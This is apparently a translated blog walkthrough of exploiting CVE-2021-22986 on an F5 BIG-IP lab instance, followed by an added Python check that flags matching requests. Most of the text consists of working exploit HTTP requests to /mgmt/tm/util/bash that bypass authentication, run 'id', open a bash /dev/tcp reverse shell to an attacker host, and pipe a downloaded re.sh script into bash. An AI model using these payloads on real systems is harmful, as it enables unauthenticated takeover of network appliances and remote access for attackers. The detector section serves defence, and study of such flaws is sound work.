F5 BIG-IP CVE-2021-22986 Verification and Exploitation


Environment setup

Test version: BIGIP-15.1.0-0.0.31.ALL-vmware

Username/password: root/[email protected]#

Network connection: NAT mode

As shown in the figure:

[Figure]

netdiscover

[Figure]

netstat -antu | grep 443

[Figure]

Visit:

https://192.168.1.137:8443/

[Figure]


Vulnerability verification: command execution

POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.1.137:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
X-F5-Auth-Token:
Authorization: Basic YWRtaW46QVNhc1M=
Content-Length: 39

{"command":"run","utilCmdArgs":"-c id"}

As shown in the figure:

[Figure]


Exploitation: reverse shell (bash)

POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.1.137:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
X-F5-Auth-Token:
Authorization: Basic YWRtaW46QVNhc1M=
Content-Length: 81

{"command":"run","utilCmdArgs":"-c 'bash -i >&/dev/tcp/192.168.1.128/7777 0>&1'"}

As shown in the figure:

[Figure]


Exploitation: reverse shell (curl)

Approach: remotely download a reverse-shell script and execute it.

Test that the curl command is present:

{"command":"run","utilCmdArgs":"-c 'curl m7bsp1.dnslog.cn' "}

[Figure]

re.sh:

[Figure]

Remotely download re.sh and execute it:

POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.1.137:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
X-F5-Auth-Token:
Authorization: Basic YWRtaW46QVNhc1M=
Content-Length: 81

{"command":"run","utilCmdArgs":"-c 'curl http://192.168.1.128:80/re.sh | bash' "}

As shown in the figure:

[Figure]
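
A defender's view of the requests above, as an added example (not code from the original article or from F5): a Python check that flags raw HTTP requests with the same shape, i.e. a POST to /mgmt/tm/util/bash carrying an empty X-F5-Auth-Token header plus Basic Authorization. The function names, the marker list and both sample requests are constructed for illustration.

```python
import json

UTIL_BASH = "/mgmt/tm/util/bash"
# Substrings seen in the utilCmdArgs values on this page (assumed, not a complete list).
SHELL_MARKERS = ("/dev/tcp/", "| bash", "bash -i")

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path.split("?", 1)[0], headers, body

def inspect(raw):
    """Return a list of findings for one request; an empty list means no match."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or path.rstrip("/") != UTIL_BASH:
        return []
    findings = ["POST to " + UTIL_BASH]
    # Token header present but empty, combined with Basic auth, as in the requests above.
    basic = headers.get("authorization", "").lower().startswith("basic ")
    if headers.get("x-f5-auth-token") == "" and basic:
        findings.append("empty X-F5-Auth-Token with Basic Authorization")
    try:
        doc = json.loads(body)
    except ValueError:
        return findings
    args = doc.get("utilCmdArgs", "") if isinstance(doc, dict) else ""
    if isinstance(args, str) and args:
        findings.append("utilCmdArgs=" + args.strip())
        if any(marker in args for marker in SHELL_MARKERS):
            findings.append("utilCmdArgs opens a shell or pipes a download to bash")
    return findings

# Constructed samples: one shaped like the page's request, one ordinary API read.
SAMPLE_HIT = ("POST /mgmt/tm/util/bash HTTP/1.1\r\nHost: 192.168.1.137:8443\r\n"
              "X-F5-Auth-Token:\r\nAuthorization: Basic YWRtaW46QVNhc1M=\r\n\r\n"
              '{"command":"run","utilCmdArgs":"-c id"}')
SAMPLE_MISS = ("GET /mgmt/tm/sys/version HTTP/1.1\r\nHost: 192.168.1.137:8443\r\n"
               "X-F5-Auth-Token: EXAMPLETOKEN\r\n\r\n")

if __name__ == "__main__":
    for sample in (SAMPLE_HIT, SAMPLE_MISS):
        print(inspect(sample))
```

The check expects full requests reassembled from a proxy or packet capture in front of the management interface; the marker list only covers the command shapes shown on this page.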


If you need this environment, leave the message "F5" on the WeChat official account.

Reference:

https://twitter.com/1ZRR4H/status/1373206181955653632

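        Living in this world, one must not go astray; and it always takes some effort to keep oneself on the track of reason.

--Wang Xiaobo, "The Silent Majority"

This article was first published on the WeChat official account (don9sec): F5 BIG-IP CVE-2021-22986 Verification and Exploitation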
